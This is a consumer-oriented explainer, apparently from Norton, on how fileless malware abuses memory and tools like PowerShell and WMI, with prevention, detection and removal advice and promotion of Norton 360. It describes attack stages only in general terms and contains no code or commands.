What is fileless malware and how does it work?

Fileless malware attacks have become an increasingly acute risk in recent years. In September 2025, The Hacker News reported that a China-linked operation used a fileless malware framework to target military systems in the Philippines. Earlier that year, another large-scale campaign used fileless techniques to infect over 1,500 PostgreSQL servers.

Because fileless malware runs mainly in a device’s memory and often uses legitimate system tools and processes, it leaves behind fewer traditional files for antivirus software to detect. As a result, fileless malware can be significantly harder to identify than conventional malware infections.

Below, we break down exactly how fileless malware works and what you can do to protect yourself.

What is fileless malware?

Fileless malware is a type of malware that operates primarily in a device’s memory instead of relying on traditional executable files stored on a hard drive. Rather than installing malicious programs, it usually abuses legitimate system tools and built-in applications already present in the operating system.

This allows fileless malware to blend more easily into normal system activity and leave behind fewer traditional traces than conventional malware. While it may be able to evade less-sophisticated antivirus tools that rely heavily on file signatures to detect malware, more modern security solutions that use behavioral analysis and activity monitoring are generally better equipped to identify and stop these attacks.

How does fileless malware work?

Fileless malware exploits trusted tools and legitimate entry vectors to go undetected while giving attackers deeper access to your system. Here’s how this plays out in most cases:

1. Initial access: Attackers usually gain entry through phishing emails, malicious links, compromised websites, or vulnerable applications. Although fileless malware aims to minimize the use of traditional files, the attack often begins with a small script, malicious document, or exploit that triggers the infection.
   
2. In-memory execution: Once inside, the malware operates mainly in the device’s memory (RAM) rather than installing large executable files on the hard drive. It often abuses legitimate system tools such as PowerShell or Windows Management Instrumentation (WMI) to run malicious commands. However, it may leave small traces in logs and memory that advanced antivirus tools can detect.
   
3. Persistence: To remain active after a reboot or logout, attackers may use techniques such as scheduled tasks, registry modifications, startup scripts, or misuse of legitimate administrative tools to maintain access across sessions and establish a persistent threat.
   
4. Post-exploitation: Once embedded, fileless malware might steal credentials, log keystrokes, exfiltrate data, and remain undetected for extended periods. Attackers often continue operating through tools like PowerShell to move laterally across a network, compromising multiple devices from a single entry point.

The ShadowHS attack reported on by Cyber Press in early 2026 is a good example of just how sophisticated fileless malware can get. It killed competing malware (like Kinseng miners) to take full control of infected systems, then exfiltrated stolen data through encrypted tunnels that blended into legitimate network traffic, allowing it to bypass firewalls.

Types of fileless malware attacks

Cybercriminals use different fileless malware techniques and types depending on what they're targeting and how they want to stay hidden. Some, like rootkits, remain in your device's memory, while others exploit tools your system already trusts.

Here are some types of fileless malware you might come across:

• Memory-resident malware: This malicious code lives entirely in your device's RAM. It leaves no trace on your hard drive and typically disappears when the system reboots. So it’s hard to detect and harder to forensically investigate without specialized tools.
• Registry-resident malware: Instead of writing files to disk, this type of malware embeds malicious code directly into the Windows registry. Some examples are Kovter and Powliks, which were common in the 2010s.
• Fileless ransomware: This type of ransomware encrypts your files without using a traditional installer on your device. And like all fileless malware, it typically runs entirely through legitimate system tools.
• Exploit kits: These are automated toolkits that scan for vulnerabilities in browsers, plugins like Java or Flash, and other applications. Once they find a weakness, they often inject malicious code directly into memory.
• Rootkits: This type of malware targets your operating system directly, allowing attackers to gain privileged access while actively hiding their presence from security tools.
• Hybrid malware: A combination of fileless and traditional malware techniques, attackers use fileless methods to evade detection while using conventional malware components to achieve specific goals.
• Script-based attacks: Attackers can use trusted scripting tools like PowerShell or JavaScript to run malicious code directly in memory. Since these are programs your system uses every day, they don't trigger security alerts.

Why fileless malware is dangerous

Fileless malware is especially dangerous because it’s designed to evade traditional detection methods. Instead of relying heavily on malicious files stored on a hard drive, it often operates in memory and abuses legitimate system tools that devices already trust and use every day.

By masking their activity as normal system behavior, attackers may be able to maintain access for extended periods before the malware is detected. In some cases, they can also move laterally across a network, compromising additional devices or accounts along the way.

The impact of a fileless malware attack can be severe, ranging from credential theft and financial fraud to large-scale identity theft or full system compromise.

How to prevent fileless malware attacks

Because fileless malware often exploits both software vulnerabilities and human behavior, practicing good cybersecurity habits can significantly reduce your risk. Here are some of the best ways to help prevent fileless malware attacks:

• Be careful when downloading apps: Only download software from trusted app stores and do your research on the app before installing it. Fileless malware often piggybacks on legitimate-looking files like a fake torrent or a compromised installer.
• Keep your software updated: Fileless malware frequently exploits known vulnerabilities in outdated software. Regular updates and security patches help close these gaps before they can be abused.
• Secure your browser: Your browser is a common attack vector for all types of malware, including fileless attacks delivered through malicious scripts or exploit kits. Keep your browser updated, remove extensions you no longer use, and avoid installing add-ons from untrusted sources.
• Watch for phishing attempts: A convincing fake email or a link that looks legitimate can be the entry point for a fileless attack. This includes “unsubscribe links” in scam emails, as they can be phishing links too.
• Limit unnecessary admin access: Since fileless attacks typically abuse legitimate administrative tools like PowerShell or WMI, restricting administrator privileges and disabling unused scripting features can help reduce the attack surface.
• Get antivirus software: Try modern security tools like Norton 360, which use behavior-based detection to monitor suspicious activity across your system, including in memory. This is one of the most effective ways to catch fileless malware threats that leave minimal digital footprints.

How to detect and remove fileless malware

Detecting fileless malware means looking for abnormal behavior in your device. Watch for unusual code execution, unexpected PowerShell or WMI use, or spikes in network traffic. These are known as indicators of attack (IOAs), and they're important signals that something malicious is happening in the background.

If you suspect a fileless malware infection, here are some steps you can take to help contain and remove it:

1. Disconnect from the internet: Immediately disable Wi-Fi or unplug your network connection to help prevent the malware from communicating with external servers, spreading across a network, or exfiltrating data.
2. Restart your device: Some fileless malware exists mainly in memory and may be disrupted or partially removed after a reboot. While restarting alone usually won’t fully eliminate the threat, it can interrupt active malicious processes.
3. Run a full security scan: Use a modern security solution like Norton 360 that includes behavioral or memory-based detection capabilities. Running a full system scan may help identify suspicious activity, persistence mechanisms, or related malware components.
4. Remove suspicious software and extensions: Uninstall unfamiliar apps, browser extensions, or recently added programs that could be connected to the infection. Resetting your browser settings may also help remove malicious scripts or unauthorized changes.
5. Restore your system: If the infection persists, restoring your device to an earlier backup or recovery point may help remove malicious changes. In severe cases, a full operating system reinstall may be the safest option.
6. Change important passwords: After securing the device, update passwords for sensitive accounts — especially email, banking, and work-related logins — in case credentials were compromised during the attack.

Protect against fileless malware with Norton

Fileless malware is designed to evade traditional defenses by hiding inside trusted system tools and running directly in memory. That’s why Norton 360 goes beyond standard file scanning with advanced behavioral and heuristic detection designed to spot suspicious activity in real time, even from ultra-stealthy threats.

With powerful, always-on protection working in the background, Norton 360 helps keep your devices safer from evolving attacks. And if Norton experts can’t remove a malware infection from your device, you’ll get your money back.

FAQs

Can Norton 360 detect fileless malware?

Yes, modern security tools like Norton 360 use behavioral analysis and pattern detection to identify suspicious activity associated with fileless malware. Because these threats often operate without traditional files, detection relies on monitoring system behavior rather than scanning files alone.

Is fileless malware a virus?

No. Fileless malware and traditional computer viruses are both forms of malware, but they operate differently. Fileless malware typically runs in memory and operates via legitimate system tools, while traditional viruses rely on infected files to spread.

What should I do if I think I clicked a malware link?

Disconnect from the internet immediately to help stop any communication with malicious servers. Then run a full system scan using trusted security software. If you entered passwords or sensitive information, change those credentials from a separate, uncompromised device as soon as possible.